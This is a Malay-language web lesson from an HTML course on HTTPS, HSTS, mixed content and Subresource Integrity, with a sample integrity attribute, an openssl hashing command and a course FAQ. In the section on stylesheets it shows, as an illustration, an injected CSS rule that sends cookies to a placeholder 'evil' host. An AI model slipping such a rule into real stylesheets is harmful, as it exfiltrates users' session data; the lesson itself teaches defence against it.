HTTPS dan Integriti Sub sumber
Sahkan integriti sumber luaran dengan atribut integrity
HTTPS dan Integriti Sub sumber ialah pelajaran HTML Academy percuma di CoddyKit. Ini ialah pelajaran 4 daripada 4. Sebanyak 3 pelajaran dalam laluan pembelajaran ini boleh dibaca sepenuhnya secara percuma — selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan praktikal dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Pelajaran ini merupakan sebahagian daripada laluan pembelajaran HTML Academy, dan kemajuan anda disegerakkan merentas web serta aplikasi CoddyKit. Kursus HTML Academy merangkumi sejumlah 4 pelajaran.
Mengapa HTTPS di Mana-mana
HTTPS menyulitkan data semasa penghantaran dan mengesahkan pelayan. Tanpa HTTPS, penyerang pada rangkaian yang sama (Wi-Fi kafe, ISP, pelaku negara) boleh membaca setiap bait dan menyuntik kandungan berniat jahat ke dalam respons. Pelayar moden menandakan halaman HTTP sebagai "Tidak Selamat" dan banyak API, seperti kamera, geolokasi dan pekerja perkhidmatan, enggan berfungsi melalui HTTP.
Kandungan Campuran
Memuatkan sumber HTTP daripada halaman HTTPS ialah kandungan campuran. Pelayar menyekat kandungan campuran aktif (skrip, iframe, helaian gaya) sepenuhnya dan memberikan amaran tentang kandungan pasif (imej). Sentiasa muatkan setiap sumber melalui HTTPS; gunakan URL relatif protokol (//cdn.example.com) atau https:// mutlak.
HSTS
HTTP Strict Transport Security melalui pengepala respons Strict-Transport-Security memberitahu pelayar supaya menolak sambungan HTTP ke domain anda pada masa akan datang. Setelah HSTS disimpan dalam cache, penyerang tidak dapat menurunkan pengguna kepada HTTP walaupun berada dalam kedudukan orang di tengah.
Mengapa SRI?
Memuatkan skrip daripada CDN pihak ketiga memang mudah tetapi berisiko — jika CDN terjejas, penyerang boleh menggantikan skrip tersebut dengan perisian hasad. Subresource Integrity (SRI) membuatkan pelayar mengesahkan cincangan kriptografi fail sebelum melaksanakannya dan enggan menjalankannya jika cincangan itu tidak sepadan.
Atribut integrity
Tambahkan cincangan SHA-256/384/512 yang dikodkan base64 pada tag skrip: <script src="https://cdn.example.com/lib.js" integrity="sha384-..." crossorigin="anonymous"></script>. Pelayar mengira cincangan fail yang dimuat turun dan enggan menjalankannya jika tidak sepadan.
<link
rel="stylesheet"
href="https://cdn.example.com/styles.css"
integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh"
crossorigin="anonymous">Menjana Cincangan
Jana cincangan dengan openssl: openssl dgst -sha384 -binary file.js | openssl base64 -A. Atau gunakan pemalam alat binaan yang menjana atribut integrity secara automatik. Kebanyakan CDN (jsdelivr, unpkg) memaparkan tag SRI dalam petikan yang boleh disalin dan ditampal.
crossorigin Diperlukan
SRI memerlukan respons silang asal untuk membenarkan semakan integriti melalui CORS. Tambahkan crossorigin="anonymous" pada tag dan pastikan CDN menghantar Access-Control-Allow-Origin. Tanpanya, pelayar enggan melakukan pengesahan dan sumber gagal dimuatkan.
Cincangan Berbilang
Atribut integrity boleh mengandungi beberapa cincangan yang dipisahkan oleh ruang. Ini berguna semasa peralihan versi: senaraikan cincangan untuk versi lama dan baharu, lalu pelayar menerima mana-mana versi yang disediakan oleh CDN. Elakkan lebih daripada beberapa cincangan supaya atribut kekal mudah dibaca.
SRI untuk Helaian Gaya
SRI turut melindungi <link rel="stylesheet">. Fail CSS yang terjejas kurang berbahaya secara langsung berbanding skrip yang terjejas, tetapi background: url("//evil/log?cookie=...") yang disuntik masih boleh mengeksfiltrasi data. Gunakan SRI pada setiap aset luaran jika boleh.
Pengehosan Sendiri Selalunya Lebih Baik
SRI mengurangkan risiko CDN terjejas tetapi tidak menyelesaikan setiap masalah: perubahan cincangan pada CDN akan merosakkan halaman anda sehingga atribut integrity dikemas kini. Untuk pustaka kritikal, hoskan sendiri fail yang telah anda semak — ini menghapuskan penguncian SRI dan risiko rantaian bekalan melalui satu langkah.
Prestasi
SRI menambah pengiraan cincangan bagi setiap sumber — tidak ketara pada perkakasan moden, hanya beberapa mikrosaat bagi setiap kilobait. Perlindungan yang diberikannya terhadap serangan rantaian bekalan jauh mengatasi kos tersebut. Tiada sebab prestasi untuk melangkau SRI apabila memuatkan sumber daripada CDN.
Had
SRI mengesahkan bait tertentu — ia tidak melindungi daripada CDN yang memberikan fail berbeza kepada sesetengah pengguna (penyasaran terpilih). Untuk jaminan maksimum, gabungkan SRI dengan HTTPS, HSTS, CSP dan pengehosan sendiri bagi aset yang paling kritikal.
Semakan Pengetahuan
Daripada apakah atribut integrity pada tag skrip melindungi anda?
Ringkasan
HTTPS menyulitkan dan mengesahkan, HSTS mencegah serangan penurunan taraf, manakala SRI mengesahkan bahawa fail pihak ketiga tidak diusik. Tambahkan cincangan integrity (dengan crossorigin="anonymous") pada setiap skrip dan helaian gaya luaran daripada CDN yang tidak anda kawal. Untuk aset yang paling kritikal, hoskan sendiri — lalu menghapuskan risiko rantaian bekalan sepenuhnya.
Pelajari HTML dengan tutor kecerdasan buatan — percuma
Tulis dan jalankan kod sebenar dalam pelayar anda, dapatkan bantuan segera daripada tutor kecerdasan buatan yang tersedia 24/7, dan sambung semula dari tempat anda berhenti di web atau dalam aplikasi.
- Kursus
- 40
- Pelajaran
- 159
Soalan Lazim
Adakah pelajaran “HTTPS dan Integriti Sub sumber” percuma?
Ya — sebanyak 3 pelajaran dalam laluan pembelajaran HTML Academy, termasuk “HTTPS dan Integriti Sub sumber”, boleh dibaca sepenuhnya secara percuma di web ini. Selepas itu, CoddyKit PRO membuka akses kepada semua pelajaran, serta latihan interaktif dengan penyunting kod terbina dalam dan tutor kecerdasan buatan yang tersedia 24/7. Kursus HTML Academy merangkumi sejumlah 4 pelajaran.
Apakah yang akan saya pelajari dalam “HTTPS dan Integriti Sub sumber”?
Sahkan integriti sumber luaran dengan atribut integrity Anda berlatih HTML Academy menggunakan kod praktikal yang dijalankan terus dalam pelayar, manakala tutor kecerdasan buatan 24/7 menjawab soalan anda semasa anda mengikuti pelajaran.
Adakah saya memerlukan pengalaman untuk memulakan HTML Academy?
Tiada pengalaman terdahulu diperlukan. Pembelajaran HTML Academy di CoddyKit disusun untuk pelajar daripada peringkat pemula hingga lanjutan, jadi anda boleh bermula di sini atau dari awal dan belajar mengikut kadar anda sendiri. Ini ialah pelajaran 4 daripada 4.
Berapa lamakah pelajaran “HTTPS dan Integriti Sub sumber” diambil?
Kebanyakan pelajaran CoddyKit mengambil masa kira-kira 5–10 minit. Setiap pelajaran ringkas dan interaktif, jadi anda boleh membuat kemajuan secara berterusan dan menyambung tepat dari tempat anda berhenti di web atau aplikasi.
Bolehkah saya menulis dan menjalankan kod dalam pelajaran HTML Academy ini?
Ya. Setiap pelajaran HTML Academy menyertakan penyunting kod terbina dalam, jadi anda boleh menulis dan menjalankan kod sebenar terus dalam pelayar serta menerima maklum balas kecerdasan buatan serta-merta — tanpa memerlukan persediaan setempat.
Semua pelajaran dalam kursus ini
- Polisi Keselamatan Kandungan meta http-equiv
- XSS melalui innerHTML dan Cara Mencegahnya
- Penyahkotakpasiran iframe dan Polisi Kebenaran
- HTTPS dan Integriti Sub sumber